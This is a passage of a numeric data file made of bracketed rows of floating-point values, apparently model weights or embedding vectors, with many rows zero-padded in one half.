0.93699, 1.07859, -4.58917, 0.10526, 0.702462, 0.101114, 0.423643, -0.577021, -7.02019, -1.08807, -0.966729, -1.80677, -0.702224, 0.338289, -0.0247392, 0.599224, -0.716852, 1.33733, 1.59795, 0.0344076, -0.752955, 0.737648, 0.505385, 0.314934, -1.47054, -7.40439, -0.22662, -0.469541, 1.07876, -2.38283, -0.813889, 2.73285, 0.0171571, 0.282823, 0.522423, 0.0157471, 0.516202, 1.11102, -15.954, 0.741384, 0.388727, -0.867902, 0.529352, -0.401276, -2.66442e-06, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.114537, 0.10598, -0.156172, 0.570041, 0.0790781, 0.0249465, -0.144188, -5.14901, -0.276242, -0.242514, 0.823004, -0.0894113, 0.0992198, 0.116433, 0.0494211, 1.18263, 0.309327, 0.695546, -0.30725, 0.0469877, -0.249266, 0.22872, 0.029531, -0.0321301, 0.0170964, 0.177514, -0.158719, -0.0720184, 0.251617, -0.322835, -0.869999, -0.0683697, 0.0689967, 1.1044, 0.658776, 0.141733, -0.642675, 0.0227559, 0.300603, -0.613163, 0.0616253, 0.350715, 0.421411, -1.80822, -0.362602, 0.15625, 0.810206, 0.494677, 0.36304, 0.134838, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.305499, -1.36809, -0.897191, 0.16324, -0.0537624, -1.76725, 0.19866, 0.959929, -1.31451, -0.374752, -0.379648, -0.0288494, 0.67931, -1.08641, -1.00468, 0.242516, -0.0887891, 0.282322, 1.38978, 0.0189617, -0.130518, -0.222661, 0.0439412, -0.657488, -0.040205, -0.137837, 0.185392, -0.103038, -0.524786, 0.791836, -2.3092, -0.130565, -0.210563, -2.22525, -0.224688, 1.78894, -0.519782, -0.0271772, 0.304988, -3.10638, -0.00897779, 1.13572, -0.0887703, 0.987188, -5.08807, -0.450802, 0.311268, -0.390058, 0.323951, 0.328965, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0191263, -0.418456, 0.452322, -0.238467, -0.112677, -0.235209, 0.212761, -1.09604, 0.363125, 0.117596, -0.182755, -0.0975529, -0.0161226, -0.367314, -0.0915179, 0.101627, 0.0974315, -0.536829, 0.123893, 0.0219319, 0.27775, -0.225176, -0.111677, 0.76017, 0.0215625, -0.116349, -0.0467867, -0.313611, -0.19544, 0.0396059, -0.294498, -0.00552971, -0.224887, 0.0624598, -0.301326, -0.260893, 0.674446, 0.0237578, 0.0168947, 0.00622512, -0.165693, -0.105525, -0.161539, 0.617691, 0.181878, -0.234296, -0.240376, -0.247368, -0.365781, -0.0939311, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.091001, 0.25656, -0.608789, 0.183065, 0.0473472, -0.759469, -0.155636, -0.119357, -0.492142, 0.222888, 1.01262, -0.433153, -1.4502, -0.300433, 0.460652, 0.270285, 0.163257, -1.0764, -0.167757, -0.00327904, 0.353072, 0.455501, -1.2675, 1.35832, 0.0466162, 0.124031, -0.93028, -0.781948, -0.509139, 0.14309, 0.41433, -0.405457, -0.0591647, 0.446954, 0.80832, 0.562178, -0.250126, -0.0116856, 0.143125, 0.036164, -0.125994, -0.408616, -0.0498638, -2.15491, 0.762678, 0.125758, 0.361817, -0.584534, 1.01374, -0.314836, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0234389, 0.725585, -0.384933, -0.306292, 0.36939, -0.739353, 0.526265, -0.772382, -0.171467, 0.919115, 0.350508, 0.0188862, 0.0329671, -0.137933, -0.612269, 1.41503, -0.79095, -0.395399, 0.214039, 0.0208286, 0.142773, -0.00828377, -0.198207, -0.930739, -0.00781282, -0.583073, 0.361856, -0.127102, 0.200032, 0.236209, 0.592643, -0.0179021, -0.207299, -0.55551, -0.237931, -0.0434666, -2.24851, -0.0472458, 0.569512, -0.358771, 0.0489592, 0.274148, -0.0542157, 1.33758, 0.0467939, 0.1089, 0.0130381, 0.228929, -0.421405, 0.0426977, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1677, 1.093, 0.2632, -0.2913, 0.292, -0.3928, 0.005524, -0.248, -0.05212, 0.1892, 0.11194, 0.518, 0.3223, -0.9653, 0.3777, -0.04855, -0.3613, -0.297, -0.4028, 0.013054, 0.05862, -0.1475, 0.2783, -0.03552, 0.03745, -0.1763, 0.6655, 0.4592, 0.1511, -0.1422, -0.3147, 0.1642, 0.39, -0.544, 0.2217, -0.4768, -0.3103, -0.003548, 0.293, 0.266, 0.269, -0.1329, 0.2559, 0.0801, -0.05716, -0.1099, 0.02507, 0.3074, 0.02931, -0.1103], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.004, 1.688, -1.09, -0.779, -0.6294, 1.943, 0.2556, -1.994, -0.346, 0.08545, -2.63, -0.02248, -0.7905, 1.716, -0.3132, -0.558, -0.0273, -1.2295, -0.579, 0.01668, 0.4563, -1.253, 0.2212, -1.21, 0.010025, -0.408, 0.501, -1.394, 0.228, -0.2488, 0.5796, 0.1198, -0.367, 2.395, 0.002527, -0.4883, 0.3486, 0.02551, 0.03424, -0.713, 0.03412, 0.954, 0.454, -2.348, 0.0899, -1.359, 1.065, -0.4785, 0.4695, 0.1465], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3547, -1.341, -0.8076, -0.2468, 0.1427, 0.8984, 0.231, 1.069, -0.3367, 0.1008, -0.1318, 0.1458, -0.2162, 1.121, -0.1875, 1.572, -0.3982, 0.0185, -0.01346, -0.02171, 0.01874, -0.2996, 0.7007, 0.1736, 0.0207, 0.4453, -0.10187, 0.03096, 0.2942, 0.6943, -5.816, -0.344, 0.512, 0.6025, 0.03262, 0.1893, 0.2301, 0.03555, 0.472, -1.487, -0.3345, -0.1076, 0.611, -0.596, -0.1573, 0.2957, -0.4995, -0.4373, -0.5054, 0.2047], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09814, -4.016, -4.016, -1.025, -2.723, -3.432, 0.1642, -2.838, 1.182, -2.979, 1.491, 0.9453, 0.0896, 4.21, 2.736, 2.676, 0.1164, -16.03, -5.008, 0.02148, -3.168, 1.455, -1.771, -0.03075, -0.0171, 2.39, 0.824, 0.4626, -0.02039, 1.523, 1.419, 1.315, -0.938, -5.24, -2.322, -0.563, -3.256, 0.011665, -1.817, -4.375, -0.2172, -2.12, -0.7246, 1.583, -1.088, 0.496, 0.0003335, -2.678, -1.597, -1.539], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.8467, 1.045, 0.3315, 0.1229, 0.357, -1.098, -0.2502, -2.365, 0.5317, 0.564, -0.3281, -2.58, 0.0218, -2.283, -0.2483, -1.0205, -0.4614, -1.313, 1.252, 0.004326, -2.957, 0.09937, 0.8184, 2.846, -0.03088, 0.823, -0.3687, -0.3564, 0.1531, 0.427, -2.164, -0.702, 0.943, 0.01339, 0.3335, 0.527, -2.26, -0.007336, -0.0454, 0.904, 0.7607, -2.377, 0.0191, -0.7427, 1.05, 0.5234, -0.2338, 0.079, 0.4988, 0.3906], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02048, -0.516, 0.5806, -0.10876, -0.02945, -0.2512, -0.1671, -0.02975, -0.2935, 0.05273, 0.866, 0.04712, 0.3738, 0.02087, -0.005604, 0.2627, 0.064, -0.423, 0.385, 0.01851, 0.268, -0.1357, 0.02525, -1.258, -0.01941, -0.1289, 0.0714, -0.03625, -0.3423, -0.12085, -0.02531, -0.3813, -0.05325, -0.2915, -0.6187, -0.2166, 0.752, -0.00676, -0.08356, -0.1754, 0.203, 0.04495, 0.273, -0.4702, -0.05984, -0.003504, -0.3787, -0.0492, -0.91, 0.03305], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2465, -0.000712, 0.03116, -0.3818, -0.2008, 0.0647, 0.0435, -0.2637, 0.09546, -0.2349, -0.08484, -0.2062, -0.2693, 0.573, -0.04385, -0.113, 0.04434, -0.2141, 0.2957, 0.04654, -0.02068, 0.0716, -0.447, -0.4043, 0.0069, -0.1166, -0.4065, -0.258, 0.04965, -0.01379, -0.155, 0.01604, -0.0787, -0.308, 0.2274, -0.007572, 0.4697, -0.047, 0.2372, 0.013565, -0.0857, 0.04617, 0.005505, -0.96, -0.1128, -0.1505, 0.171, 0.1923, 0.05737, 0.2292], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.197, -0.1536, -0.01258, -0.0478, 0.069, -0.04745, 0.1175, 0.012886, -0.1218, 0.05362, 0.2416, -0.1874, -0.1833, -1.046, -0.0709, 0.3003, -0.02048, -0.05188, -0.0715, 0.04532, 0.4236, -0.1324, -0.376, 0.356, -0.02734, 0.7197, -0.5015, 0.0862, -0.04205, -0.5024, 0.12134, -0.03162, -0.2346, -0.4258, 0.1377, 0.2362, 1.229, 0.001817, -0.03622, 0.2344, -0.2119, -0.1433, -0.11035, -0.8813, -0.1638, -0.5654, 0.07184, -0.10144, 0.3762, 0.083], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0079, -0.733, -0.02264, 0.2317, -0.1412, 0.08276, -0.06204, 0.2822, 0.149, -0.2063, 0.501, -0.03445, 0.1549, -0.232, -0.6074, -0.1465, 0.3218, 0.4402, 0.2175, 0.0233, 0.013214, -0.0341, 0.5913, -0.2683, 0.03885, 0.3975, -0.02505, 0.1516, -0.2151, -0.1771, 0.01501, -0.476, 0.01823, 0.3572, 0.6743, -0.2764, -0.492, -0.03696, -0.1536, 0.1113, -0.1359, 0.3037, -0.004055, -0.724, -0.4329, 0.12366, -0.4277, -0.4307, 0.66, 0.0149], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0694, -0.3572, -0.0797, -0.1587, 0.1421, -0.02989, -0.1342, 0.0269, 0.0206, -0.1859, -0.0914, -0.1891, -0.107, -0.01674, 0.0714, 0.02571, 0.4155, 0.01665, 0.3494, -0.0413, 0.0399, 0.2705, -0.3562, 0.5293, 0.0334, 0.1068, -0.0595, -0.0982, -0.05847, 0.1638, 0.0997, -0.00914, -0.2448, 0.1567, -0.203, 0.1192, 0.498, -0.01499, -0.691, 0.1163, -0.001963, 0.1622, -0.08923, -0.4424, 0.01558, 0.3157, -0.2314, -0.1498, -0.08923, 0.10126], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.224, -2.688, -0.519, -2.805, -0.993, -0.2654, 1.09, -0.69, 0.6855, -0.849, -0.1638, -0.3933, 0.1016, 1.0205, -1.686, 1.02, -0.7876, -0.7603, -0.583, -0.01431, -1.247, -0.4097, 1.308, -2.43, 0.02089, -0.3984, -0.642, 0.0295, -0.4976, -0.761, -5.0, 0.782, 0.436, 3.045, -0.9453, 0.4495, 0.438, -0.010345, -0.391, -1.794, 0.2803, -0.03934, 0.2986, -0.7485, 0.05582, 0.254, -0.301, 0.6094, -0.2715, -0.2235], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -4.207, -0.684, -0.2307, -2.1, -0.499, -3.615, 1.2705, -2.338, -1.82, 0.9336, -1.449, -2.213, 0.6543, 0.418, -0.0253, 2.979, -0.372, -0.645, -3.746, 0.01775, -0.6104, -0.05637, -0.9897, -4.312, -0.0295, -4.785, -4.965, 0.8423, -0.1815, -3.037, 3.055, 2.176, -4.63, -10.43, -3.58, -2.258, -1.034, -0.03772, -2.566, 2.295, 0.1971, -1.525, -1.73, 4.94, -1.826, -2.732, -2.26, -2.408, -1.115, -1.1875], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2499, -1.087, 0.379, -0.5625, -0.312, -0.576, 0.2091, 0.002441, 0.1512, 0.4072, -0.2433, -0.7495, -0.4255, 0.3086, -0.6523, 0.4587, 0.3308, -0.724, -0.422, -0.0427, -0.1351, 0.877, -0.195, -0.582, 0.04242, -0.9507, -0.1897, -0.7686, -0.2695, -0.07544, -0.04727, -0.1667, -0.2311, 0.3513, 0.259, -0.2491, -1.07, -0.002342, -0.599, -1.082, -0.671, -1.53, -0.3416, 2.375, -0.0967, 0.2627, 0.7524, -0.237, -0.543, 0.1169], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.00675, -0.2299, -0.01758, -0.1187, -0.2343, 0.2476, 0.26, -2.334, -0.04282, -0.0685, -0.2145, -0.03787, -0.1678, 0.8813, 0.1658, 0.4556, 0.147, 0.0364, 0.4333, -0.007786, -0.1469, 0.328, -0.3315, 0.5347, -0.01426, 0.1104, -0.1159, -0.428, 0.02469, -0.1293, -1.019, 0.0893, 0.1478, -0.616, 0.3503, -0.178, -0.36, -0.01434, 0.1444, -0.4512, -0.4316, 0.286, -0.2208, 1.604, -0.3445, 0.005417, 0.709, 0.271, 0.1005, 0.03494], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09235, -0.4072, 0.197, -0.013596, -0.53, -0.6, -0.12085, 0.5176, 0.1393, -0.4302, -0.4543, -0.641, -0.662, -0.04498, -0.3596, 0.1577, 0.3796, -0.8047, 0.248, -0.0023, 0.4336, 0.1709, -0.9854, 0.1952, 0.02985, -0.616, -1.614, -0.01566, 0.4292, -0.1399, -0.733, 0.2527, 0.4038, -0.839, -0.722, -0.1203, 0.4277, 0.01284, 0.1268, -0.663, 0.032, -1.025, -0.2148, -4.71, -0.04242, -0.3003, 0.4607, 0.4023, -0.5225, 0.03072], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.513, 1.877, -0.703, 0.1296, 0.6387, -5.29, 0.0826, -0.7036, -0.2632, -0.915, -0.566, -2.102, -0.4734, 0.458, 0.4539, 0.3105, -0.1346, -0.164, 1.159, 0.03937, 0.1068, 0.0503, -0.3796, -0.3352, -0.01595, 0.1967, 0.3782, -0.918, 0.685, -5.59, 3.463, -0.1538, -0.9214, -0.247, -0.813, -0.4238, 0.1693, -0.02199, -2.172, -0.2834, -0.1203, 0.0748, -0.1825, 2.162, -3.926, -0.07654, -3.95, -0.652, -0.08545, -0.4646], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2144, -0.382, 0.3762, -3.68, -0.3582, -1.329, -0.5356, 2.045, 0.6953, -0.9507, -0.2252, 0.66, -0.511, 1.518, -0.1126, -0.7153, 0.2825, -0.429, 1.185, 0.0442, 0.03677, 0.6606, -0.3499, -0.8125, -0.03006, 0.1597, -1.041, 0.8877, 0.2146, -0.886, -0.7305, -0.07654, 0.1841, 0.5625, -2.248, 0.1123, 1.111, -0.02628, -0.01898, -0.875, -0.3604, -0.8647, -0.2793, 0.3252, -3.387, 0.000314, 0.3757, -0.1212, -3.252, 0.4495], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06204, -0.127, 0.01333, 0.615, -0.5083, -0.2324, -0.08984, -2.744, -0.2144, -0.7554, 0.02829, -0.48, 0.10724, -0.564, -0.1615, 0.01678, 0.3381, 0.9575, 0.5654, 0.04697, 0.1361, 0.1151, -0.574, -1.687, 0.02774, 0.4082, -0.512, -0.127, -0.163, -0.677, -0.123, -0.08813, 0.2008, 0.4258, 0.09656, -0.0753, -0.7505, -0.007072, -0.391, -0.0878, 0.005978, 0.588, -0.005154, -0.376, 0.788, 0.2527, 0.5615, -0.2446, 0.167, -0.2388], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2152, -0.3323, 0.5815, 0.8496, 0.2329, -0.3848, 0.4548, 1.066, -1.532, -0.4375, -0.000891, -0.8643, 0.744, -0.247, -0.748, -1.028, -0.6475, 0.4124, 1.269, -0.0089, 0.7603, 0.014305, -0.5195, -0.236, 0.003265, 0.2191, -1.037, -0.5806, 0.1332, -0.4612, -1.724, 0.4407, 0.589, 0.00984, 0.3486, -0.7686, -0.3003, -0.02402, -0.645, -3.924, -0.04477, -0.1476, -0.0905, 0.567, 0.828, -0.525, -0.719, 0.2308, -1.196, -1.165], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2175, 0.333, 0.4937, 0.04175, -0.2301, -0.1752, 0.4104, 0.1885, 0.1918, 0.1936, 0.1189, -0.0554, -0.00472, -0.1534, -0.001394, -0.10266, 0.1626, -0.1302, -0.1288, -0.03998, -0.1746, -0.04276, -0.0819, 0.379, 0.01402, -0.0627, -0.12415, -0.07965, 0.00867, 0.00068, -0.0576, 0.03912, -0.1843, -0.2559, 0.1814, 0.3154, 0.3667, 0.0025, 0.2979, -0.3638, 0.04285, -0.00938, -0.1559, 0.11383, -0.2462, -0.0006285, 0.0999, 0.0401, 0.3157, 0.02695], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0362, -0.07996, -0.01227, -0.2487, 0.1231, -0.2043, -0.02386, 0.11694, 0.01313, 0.039, 0.10376, 0.0377, 0.01768, 0.05212, -0.2036, -0.1719, -0.05786, -0.251, -0.05133, -0.006294, 0.05814, -0.0891, 0.06024, -0.562, 0.01136, -0.1989, 0.088, -0.03665, -0.1285, -0.01888, -0.3018, -0.098, -0.0511, -0.0007734, -0.0635, -0.03506, -0.086, 0.004528, 0.05334, 0.0726, 0.2075, 0.08026, 0.1888, -0.3113, -0.03705, 0.07294, 0.02449, -0.06384, -0.0677, 0.1196], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4473, 2.344, -0.719, -0.475, -1.044, 1.878, 0.9546, 0.3433, 0.769, -0.008896, 1.27, -0.06168, -1.067, -1.233, -0.897, 0.783, -0.6646, -1.414, -0.429, 0.01709, 0.1489, -0.466, -1.039, -1.35, 0.02756, -1.314, -0.2018, -0.6567, 0.3306, 0.0687, 0.8687, 0.4749, -0.681, 0.559, 0.1361, 